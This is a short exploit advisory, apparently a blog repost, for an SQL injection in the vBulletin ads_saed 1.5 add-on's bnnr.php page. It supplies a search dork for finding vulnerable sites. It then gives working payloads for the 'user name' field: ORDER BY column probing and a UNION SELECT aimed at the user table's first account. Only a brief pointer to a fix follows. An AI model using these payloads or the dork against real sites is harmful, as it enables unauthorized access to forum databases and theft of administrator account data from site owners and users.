vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability___________________________________ |
Author: Hussin X |
Home : www.IQ-TY.com |
Mail : darkangel_G85@yahoo.com |
___________________________________ |
## script name : ads_saed |
## d0rk : inurl:"vb/bnnr.php" |
## Example : |
Go to url : http://server/vb/bnnr.php |
Exploit in the input "user name" blind injection |
user name = ' ORDER BY 15/* |
user name = ' ORDER BY 16/* |
Now go to Source page : " Unknown column '16' in 'order clause'" |
exploit : |
user name = |
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/* |
# Solution : See here |
http://www.traidnt.net/vb/showthread.php?t=1102593 |
or update new Product |
End
No comments:
Post a Comment